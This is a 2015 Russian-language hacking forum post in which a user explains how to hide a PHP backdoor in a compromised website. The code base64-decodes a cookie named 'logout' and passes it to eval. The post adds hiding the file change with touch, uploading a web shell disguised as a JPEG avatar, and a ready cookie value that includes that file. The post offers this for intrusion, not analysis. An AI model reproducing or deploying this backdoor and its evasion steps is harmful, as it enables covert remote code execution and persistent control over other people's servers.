21.07.2015, 01:52
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
С нами:
10991846
Репутация:
2054
|
|
Сообщение от dondy
↑
самое хреновое если админ видет что туда обращение идёт через логи
***
и ещё понасрать в логи разными запросами к стандартным страницам то можно и затеряться
Зачем столько гемора? Если есть возможность правки, то запрятать в строках примитивный код типа
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]***
[/COLOR][COLOR="#0000BB"]$logout[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]base64_decode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logout'[/COLOR][COLOR="#007700"]]);
***
if (isset([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'logout'[/COLOR][COLOR="#007700"]]))
{@die(eval([/COLOR][COLOR="#0000BB"]$logout[/COLOR][COLOR="#007700"]));}
[/COLOR][/COLOR]
поправить время через touch, залить jpeg-шелл в аватарки/etc и печеньку подсунуть
Код:
logout=aW5jbHVkZSgiL2hvbWUvdXNlci93d3cvYXZhdGFycy91c2VyLmpwZyIpOw==
Вариантов много, лиж бы фантазии хватило.
__________________
Лучший способ защиты - это нападение!!!
|
|
|